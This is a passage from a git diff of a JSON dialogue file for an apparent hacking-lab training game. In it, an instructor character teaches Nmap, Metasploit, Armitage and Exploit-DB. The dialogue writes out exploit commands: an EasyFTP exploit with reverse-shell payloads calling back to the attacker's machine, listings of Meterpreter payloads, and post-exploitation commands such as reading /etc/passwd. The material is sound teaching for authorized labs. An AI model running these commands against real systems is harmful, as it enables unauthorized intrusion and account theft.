diff --git a/scenarios/lab_exploitation/ink/instructor.json b/scenarios/lab_exploitation/ink/instructor.json
index 058e35e..fc80b71 100644
--- a/scenarios/lab_exploitation/ink/instructor.json
+++ b/scenarios/lab_exploitation/ink/instructor.json
@@ -1 +1 @@
-{"inkVersion":21,"root":[[["done",{"#n":"g-0"}],null],"done",{"start":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome back, ","ev",{"VAR?":"player_name"},"out","/ev","^. What would you like to discuss?","\n",{"->":"exploitation_hub"},null],"intro_timed":["ev",0,"/ev",{"VAR=":"instructor_rapport","re":true},"ev",0,"/ev",{"VAR=":"exploitation_mastery","re":true},"^Welcome to From Scanning to Exploitation, ","ev",{"VAR?":"player_name"},"out","/ev","^. I'm your exploitation specialist instructor for this session.","\n","^This lab brings together everything you've learned so far - scanning, vulnerability research, and exploitation. You'll learn how to move from network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.","\n","^We'll use both Metasploit console and Armitage, a graphical interface that can automate parts of the hacking process.","\n","^Remember: this knowledge is for authorized penetration testing and defensive security only.","\n","ev",{"VAR?":"exploitation_mastery"},10,"+",{"VAR=":"exploitation_mastery","re":true},"/ev","#","^influence_increased","/#","^Let me explain how this lab works. You'll find three key resources here:","\n","^First, there's a Lab Sheet Workstation in this room. This gives you access to detailed written instructions and exercises that complement our conversation. Use it to follow along with the material.","\n","^Second, in the VM lab room to the north, you'll find terminals to launch virtual machines. You'll work with a Kali Linux attacker machine, a Windows server, and a Linux server for hands-on exploitation practice.","\n","^Finally, there's a Flag Submission Terminal where you'll submit flags you capture during the exercises. These flags demonstrate that you've successfully completed the challenges.","\n","^You can talk to me anytime to explore exploitation concepts, get tips, or ask questions about the material. I'm here to help guide your learning.","\n","^Ready to get started? Feel free to ask me about any topic, or head to the lab sheet workstation and VM room when you're ready to begin the practical exercises.","\n",{"->":"exploitation_hub"},null],"exploitation_hub":[["^What aspect of exploitation would you like to explore?","\n","ev","str","^Why combine scanning and exploitation?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Scanning targets with Nmap","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Metasploit database and scan import","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Running scans from within msfconsole","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Searching for Metasploit exploits","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Launching Metasploit exploits","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Introduction to Armitage","/str","/ev",{"*":".^.c-6","flg":4},"ev","str","^Using Armitage for automated hacking","/str","/ev",{"*":".^.c-7","flg":4},"ev","str","^Vulnerability databases and research","/str","/ev",{"*":".^.c-8","flg":4},"ev","str","^The Exploit Database and searchsploit","/str","/ev",{"*":".^.c-9","flg":4},"ev","str","^Show me the commands reference","/str","/ev",{"*":".^.c-10","flg":4},"ev","str","^Practical challenge tips","/str","/ev",{"*":".^.c-11","flg":4},"ev","str","^I'm ready for the lab exercises","/str","/ev",{"*":".^.c-12","flg":4},"ev","str","^That's all for now","/str","/ev",{"*":".^.c-13","flg":4},{"c-0":["\n",{"->":"scanning_to_exploitation"},null],"c-1":["\n",{"->":"nmap_scanning"},null],"c-2":["\n",{"->":"metasploit_database"},null],"c-3":["\n",{"->":"msfconsole_scanning"},null],"c-4":["\n",{"->":"searching_exploits"},null],"c-5":["\n",{"->":"launching_exploits"},null],"c-6":["\n",{"->":"armitage_intro"},null],"c-7":["\n",{"->":"armitage_usage"},null],"c-8":["\n",{"->":"vulnerability_databases"},null],"c-9":["\n",{"->":"exploit_db"},null],"c-10":["\n",{"->":"commands_reference"},null],"c-11":["\n",{"->":"challenge_tips"},null],"c-12":["\n",{"->":"ready_for_practice"},null],"c-13":["\n","#","^exit_conversation","/#","end",null]}],null],"scanning_to_exploitation":[["^After gathering information about a target through footprinting and scanning, you need to know what attacks will work.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The key questions are: Where will you find vulnerability information? How will you use that information to launch an attack? How can security professionals use this to test system security?","\n","^Once you know the operating system and software running on a system, you can refer to your own knowledge of known vulnerabilities, or search online databases for more extensive information.","\n","ev","str","^What makes a target exploitable?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I know what attacks will work?","/str","/ev",{"*":".^.c-1","flg":4},{"c-0":["\n","^A target is exploitable when it's running vulnerable software that you have an exploit for.","\n","^For example, if a target is running an old version of Windows with known vulnerabilities, there are numerous exploits that could give you full control of the system.","\n","^The scanning phase reveals what's running. The vulnerability research phase identifies what's vulnerable. The exploitation phase is when you actually attack.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^This is where vulnerability databases and exploit frameworks like Metasploit come in.","\n","^After scanning reveals \"Windows 2000 with EasyFTP 1.7.0.11,\" you can search for known vulnerabilities in those specific versions.","\n","^Metasploit has over a thousand exploits built in. You can search them by platform, service name, or CVE number.","\n","^We'll also look at external databases like CVE Details, NVD, and Exploit DB.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"nmap_scanning":[["^The first step is thorough scanning to identify your targets and what they're running.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^For this lab, you'll scan your network to find two vulnerable servers - one Linux and one Windows.","\n","^A comprehensive scan would be: nmap -sV 10.X.X.2-3","\n","^Where X.X are the second and third octets of your Kali VM's IP address.","\n","ev","str","^What should I look for in the scan results?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What if the scan takes too long?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if nmap shows ftp with a question mark?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Pay attention to several key pieces of information:","\n","^First, the IP addresses - which host is Linux and which is Windows?","\n","^Second, what services are running - HTTP, FTP, SSH, IRC?","\n","^Third, and most importantly, what specific software versions are running. For example: \"vsftpd 2.3.4\" or \"EasyFTP 1.7.0.11\"","\n","^Those specific version numbers are critical for finding applicable exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Windows scans can take several minutes to complete - this is normal.","\n","^If you want faster results, you can skip OS detection or scan fewer ports.","\n","^However, for thorough penetration testing, patience is important. You don't want to miss a vulnerable service on an unusual port.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^If you see \"ftp?\" in the results, it means Nmap isn't confident about the service identification.","\n","^This can happen if the service is slow to respond or behaving unusually.","\n","^Try restarting the Windows server and scanning again. The service should respond properly after a fresh start.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"metasploit_database":[["^Metasploit includes a PostgreSQL database that stores information about hosts, services, and vulnerabilities.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^This database integration is extremely powerful - it lets you import scan results and automatically target vulnerable services.","\n","^Before using the database, you need to initialize it and start PostgreSQL.","\n","ev","str","^How do I initialize the Metasploit database?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I import Nmap scan results?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What can I do with the database?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^First, reinitialize the database: sudo msfdb reinit","\n","^Then start PostgreSQL: sudo service postgresql start","\n","^These commands set up the database that Metasploit will use to store scan results and track compromised hosts.","\n","^You only need to do this once per session, or after restarting your Kali VM.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^If you've saved Nmap results in XML format, you can import them:","\n","^From msfconsole, run: db_import scan_output.xml","\n","^Metasploit will parse the XML and populate the database with host and service information.","\n","^You can then query this data with commands like \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Once data is in the database, you can query it intelligently:","\n","^\"hosts\" shows all discovered hosts and their operating systems.","\n","^\"services\" shows all discovered services across all hosts.","\n","^\"services -p 21\" shows only services on port 21 (FTP).","\n","^\"services -p 21 -R\" does the same AND automatically sets RHOSTS to target those services!","\n","^This integration makes targeting much more efficient.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"msfconsole_scanning":[["^You can run scans directly from within msfconsole - you don't always need a separate terminal.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Msfconsole can run Bash commands, so you can run Nmap directly: msf > nmap -O -sV TARGET","\n","^Even better, you can use db_nmap which scans AND automatically imports results into the database.","\n","ev","str","^What's the difference between nmap and db_nmap?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Does Metasploit have its own scanners?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I use Metasploit's port scanner?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^When you run \"nmap\" from msfconsole, it just executes Nmap normally. You'd need to manually import the results.","\n","^When you run \"db_nmap\", it does the same scan BUT automatically imports results into the Metasploit database.","\n","^For example: msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^This scans all ports with OS and version detection, and the results are immediately available via \"hosts\" and \"services\"","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Yes! Metasploit has various port scanning modules, though they're not as feature-complete as Nmap.","\n","^You can see them with: use auxiliary/scanner/portscan/ (then press TAB)","\n","^For a basic TCP connect scan: use auxiliary/scanner/portscan/tcp","\n","^These modules integrate directly with the database and can use multiple threads for faster scanning.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, select the module: use auxiliary/scanner/portscan/tcp","\n","^Set the target: set RHOSTS TARGET_IP","\n","^Optionally speed it up: set THREADS 10","\n","^Then run it: run","\n","^Results are automatically stored in the database. You can verify with the \"services\" command.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"searching_exploits":[["^Metasploit's search command is incredibly powerful for finding relevant exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^You can search by platform, service name, CVE number, exploit type, and more.","\n","^The basic syntax is: search <keyword>","\n","^But you can be much more specific with search operators.","\n","ev","str","^What search operators are available?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I search for specific software?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Give me some search examples","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the main search operators:","\n","^type: - Specify module type (exploit, auxiliary, post)","\n","^platform: - Specify platform (Windows, Linux, etc.)","\n","^cve: - Search by CVE number","\n","^name: - Search module names","\n","^For example: search type:exploit platform:Windows","\n","^Or: search type:exploit cve:2003-0352","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Simply include the software name in the search:","\n","^search easyftp","\n","^search vsftpd","\n","^search unreal","\n","^Metasploit will search module names, descriptions, and references for matches.","\n","^Look through the results for modules that match your target's version number.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Sure! Here are useful searches:","\n","^search type:exploit platform:linux","\n","^search type:exploit cve:2018","\n","^search buffer overflow","\n","^search type:exploit platform:Windows XP","\n","^search IRC (to find IRC server exploits)","\n","^Once you find a promising module, use \"info exploit/path/to/module\" to learn more about it.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"launching_exploits":[["^Once you've identified the right exploit module, launching it follows a standard workflow.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^The process is: select the module, configure options, choose a payload, and launch the attack.","\n","^Let's walk through a typical exploitation scenario.","\n","ev","str","^Walk me through exploiting EasyFTP","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What payloads should I use?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What if the exploit doesn't work?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^What can I do once I have a shell?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Let me guide you through the complete process:","\n","^First, select the exploit: use exploit/windows/ftp/easyftp_cwd_fixret","\n","^Check required options: show options","\n","^Set the target: set RHOST TARGET_IP","\n","^Choose a payload: set PAYLOAD windows/shell/reverse_tcp","\n","^Set your IP for the reverse shell: set LHOST YOUR_KALI_IP","\n","^Optionally check if it's vulnerable: check (though most don't support this)","\n","^Launch the attack: exploit","\n","^If successful, you'll get a shell on the target!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^The payload depends on what you want to achieve and what the exploit supports.","\n","^You can see compatible payloads with: show payloads","\n","^For Windows targets, common choices include:","\n","^windows/shell/reverse_tcp - Basic command shell","\n","^windows/meterpreter/reverse_tcp - Powerful Meterpreter shell with advanced features","\n","^For Linux targets:","\n","^cmd/unix/reverse - Simple Unix shell","\n","^linux/x86/meterpreter/reverse_tcp - Meterpreter for Linux","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^First, run \"show options\" and verify all settings, especially IP addresses.","\n","^Make sure you're using the correct IP - YOUR Kali IP for LHOST, and the TARGET IP for RHOST.","\n","^Try restarting the target VM - sometimes services crash after failed exploit attempts.","\n","^Verify the target is actually running the vulnerable software at that version.","\n","^Some exploits are unreliable and may need multiple attempts.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^With a Windows shell, you can run commands like:","\n","^dir C: (list files)","\n","^net user (list user accounts)","\n","^whoami (check your privileges)","\n","^For Linux shells:","\n","^ls -la (list files)","\n","^cat /etc/passwd (view user accounts)","\n","^whoami (check current user)","\n","^We'll cover post-exploitation in more depth in later labs.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_intro":[["^Armitage is a free and open source graphical interface for Metasploit with powerful automation features.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It was created to make Metasploit more accessible and to automate repetitive tasks in penetration testing.","\n","^Armitage can scan networks, automatically suggest attacks, and visualize compromised systems.","\n","ev","str","^How is Armitage different from msfconsole?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I start Armitage?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What does the Armitage interface show?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Msfconsole is a command-line interface that gives you complete control and flexibility.","\n","^Armitage provides a graphical interface that visualizes the network and automates finding attacks.","\n","^Armitage can look at scan results and automatically suggest which exploits might work against each target.","\n","^It's particularly useful for beginners or when you want to quickly test multiple targets.","\n","^However, experienced penetration testers often prefer msfconsole for its power and speed.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^First, initialize the Metasploit database if you haven't already:","\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^Then start Armitage: armitage &","\n","^The & runs it in the background so you can continue using your terminal.","\n","^Leave the connection options as default and click \"Connect\"","\n","^If prompted, allow Armitage to start the Metasploit RPC server.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Armitage displays a visual network map showing discovered hosts.","\n","^Each host is represented by an icon - the icon shows the detected operating system.","\n","^Compromised systems are shown in red with lightning bolts.","\n","^You can right-click hosts to see suggested attacks, launch exploits, or interact with shells.","\n","^The interface makes it easy to see the big picture of a network and what you've compromised.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"armitage_usage":[["^Let me walk you through using Armitage to scan and exploit targets.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^Armitage integrates scanning, vulnerability analysis, and exploitation into a streamlined workflow.","\n","ev","str","^How do I scan with Armitage?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How does Armitage suggest attacks?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^How do I launch an attack in Armitage?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I interact with a compromised system?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Click the \"Hosts\" menu, select \"Nmap Scan\", then choose a scan type.","\n","^\"Quick Scan (OS detect)\" is a good starting point: nmap -O -sV TARGET","\n","^Enter the IP address to scan and Armitage will run Nmap.","\n","^Results are automatically imported into the Metasploit database and displayed visually.","\n","^Any previously scanned hosts in the database will also appear automatically.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Armitage analyzes the operating system and services detected on each host.","\n","^First, set the exploit rank to include more options: Armitage menu → Set Exploit Rank → Poor","\n","^Then click: Attacks → Find attacks","\n","^Armitage will match detected services to available exploits in Metasploit.","\n","^Right-click a host and select \"Attack\" to see suggested exploits categorized by service.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Right-click the target host and select \"Attack\"","\n","^Navigate through the menu to find the exploit - for example: ftp → easyftp_cwd_fixret","\n","^Click \"Launch\" and Armitage will configure and run the exploit.","\n","^If successful, the host icon turns red showing it's compromised!","\n","^You can then right-click the compromised host to interact with shells or run post-exploitation modules.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Right-click the compromised (red) host.","\n","^Look for \"Meterpreter 1\" or \"Shell 1\" depending on the payload used.","\n","^Click \"Interact\" → \"Command shell\" to open a terminal.","\n","^You can now run commands like \"dir\" on Windows or \"ls\" on Linux.","\n","^Armitage also has menu options for common post-exploitation tasks.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"vulnerability_databases":[["^Beyond Metasploit, there are numerous online vulnerability databases you should know about.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^These databases provide detailed information about known vulnerabilities, even if exploits aren't publicly available.","\n","^Different databases have different focuses and information, so it's worth checking multiple sources.","\n","ev","str","^What are the main vulnerability databases?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^What information do these databases provide?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Do all vulnerabilities have CVEs?","/str","/ev",{"*":".^.c-2","flg":4},{"c-0":["\n","^Here are the most important ones:","\n","^CVE Details (cvedetails.com) - Searchable CVE database with statistics and visualizations.","\n","^NVD (nvd.nist.gov/vuln/search) - National Vulnerability Database, the official US government repository.","\n","^SecurityFocus (securityfocus.com/bid) - Bugtraq ID database with discussion forums.","\n","^Packet Storm Security (packetstormsecurity.com) - Security tools, exploits, and advisories.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^Vulnerability databases typically include:","\n","^CVE numbers - unique identifiers for each vulnerability.","\n","^Severity scores (CVSS) - numerical ratings of how serious the vulnerability is.","\n","^Affected versions - which specific software versions are vulnerable.","\n","^Technical descriptions of the vulnerability.","\n","^References to patches, advisories, and sometimes proof-of-concept code.","\n","^Information about whether exploits exist in the wild.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^No! This is an important point.","\n","^CVE and NVD list officially registered security vulnerabilities, but not all possible vulnerabilities are necessarily registered and assigned CVEs.","\n","^Sometimes researchers publish vulnerabilities before CVEs are assigned.","\n","^Some vendors have their own vulnerability identifiers.","\n","^Zero-day vulnerabilities (unknown to vendors) obviously won't have CVEs yet.","\n","^This is why checking multiple sources and forums is important.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"exploit_db":[["^The Exploit Database (Exploit-DB) is an extensive database focused on vulnerabilities with working exploits.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#","^It's maintained by Offensive Security (the makers of Kali Linux) and contains thousands of exploits with source code.","\n","^Kali Linux includes a local copy of the entire database!","\n","ev","str","^How do I search Exploit-DB online?","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^How do I use the local Exploit-DB copy?","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^What's searchsploit?","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^How do I use standalone exploits from Exploit-DB?","/str","/ev",{"*":".^.c-3","flg":4},{"c-0":["\n","^Visit exploit-db.com and use their search function.","\n","^You can search by software name, version, platform, or exploit type.","\n","^Each exploit listing includes the source code, often in Python, C, PHP, or other languages.","\n","^The database also categorizes exploits by type: remote, local, web application, DoS, etc.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-1":["\n","^On Kali Linux, exploits are stored in /usr/share/exploitdb/","\n","^They're organized by platform: windows, linux, osx, etc.","\n","^You can list Windows exploits with: find /usr/share/exploitdb/exploits/windows then pipe to less","\n","^There's also an index file with descriptions: less /usr/share/exploitdb/files_exploits.csv","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-2":["\n","^Searchsploit is a command-line tool for searching the local Exploit-DB copy.","\n","^It's much faster and more convenient than manually searching files.","\n","^Basic usage: searchsploit easyftp","\n","^You can also use grep on the CSV file: grep -i \"EasyFTP\" /usr/share/exploitdb/files_exploits.csv","\n","^To download an exploit to your current directory: searchsploit -m windows/remote/11539.py","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"c-3":["\n","^Standalone exploits often require some manual setup:","\n","^You might need to edit the source code to set the target IP address.","\n","^Some exploits require compilation (C/C++ code).","\n","^Python exploits might need specific library dependencies.","\n","^Read the exploit code comments carefully - they usually explain how to use it.","\n","^Always understand what an exploit does before running it!","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.g-0"},null],"g-0":[{"->":"exploitation_hub"},null]}],null],"commands_reference":[["^Let me provide a comprehensive commands reference for this lab.","\n","ev",{"VAR?":"instructor_rapport"},5,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",[["ev",{"^->":"commands_reference.0.11.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Initial Scanning:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.11.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Metasploit Database Setup:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.11.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^nmap -sV 10.X.X.2-3 (scan for two servers)","\n","^nmap -O -sV -p 1-65535 TARGET (comprehensive scan)","\n",{"->":".^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.11.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^sudo msfdb reinit","\n","^sudo service postgresql start","\n","^msfconsole (start Metasploit console)","\n",{"->":".^.^.^.g-0"},{"#f":5}]}],"ev","str","^Show me scanning from msfconsole","/str","/ev",{"*":".^.c-0","flg":4},"ev","str","^Show me Metasploit scanning modules","/str","/ev",{"*":".^.c-1","flg":4},"ev","str","^Show me searching for exploits","/str","/ev",{"*":".^.c-2","flg":4},"ev","str","^Show me launching exploits","/str","/ev",{"*":".^.c-3","flg":4},"ev","str","^Show me post-exploitation commands","/str","/ev",{"*":".^.c-4","flg":4},"ev","str","^Show me Armitage commands","/str","/ev",{"*":".^.c-5","flg":4},"ev","str","^Show me Exploit-DB commands","/str","/ev",{"*":".^.c-6","flg":4},{"c-0":["\n",[["ev",{"^->":"commands_reference.0.c-0.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Scanning from Msfconsole:**",{"->":"$r","var":true},null]}],["ev",{"^->":"commands_reference.0.c-0.1.1.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-1","flg":18},{"s":["^Database Queries:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-0.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > nmap -O -sV TARGET","\n","^msf > db_nmap -O -sV -p 1-65535 TARGET","\n","^msf > db_import scan_output.xml","\n",{"->":".^.^.^.^.g-0"},{"#f":5}],"c-1":["ev",{"^->":"commands_reference.0.c-0.1.c-1.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.1.s"},[{"#n":"$r2"}],"\n","^msf > hosts (show all hosts)","\n","^msf > services (show all services)","\n","^msf > services -p 21 (show services on port 21)","\n","^msf > services -p 21 -R (and set RHOSTS)","\n","ev",{"VAR?":"instructor_rapport"},3,"+",{"VAR=":"instructor_rapport","re":true},"/ev","#","^influence_increased","/#",{"->":".^.^.^.^.g-0"},{"#f":5}]}],null],"c-1":["\n",[["ev",{"^->":"commands_reference.0.c-1.1.0.$r1"},{"temp=":"$r"},"str",{"->":".^.s"},[{"#n":"$r1"}],"/str","/ev",{"*":".^.^.c-0","flg":18},{"s":["^Metasploit Port Scanners:**",{"->":"$r","var":true},null]}],{"c-0":["ev",{"^->":"commands_reference.0.c-1.1.c-0.$r2"},"/ev",{"temp=":"$r"},{"->":".^.^.0.s"},[{"#n":"$r2"}],"\n","^msf > use auxiliary/scanner/portscan/ (TAB to see options)","\n","^msf > use auxiliary/scanner/portscan/tcp","\n","^msf auxiliary(tcp) > set RHOSTS TARGET","\n","^msf auxiliary(tcp) > set THREADS 10","\n","^msf auxiliary(tcp) > run","\n","^msf auxiliary(tcp) > services","\n","^msf auxiliary(tcp) > 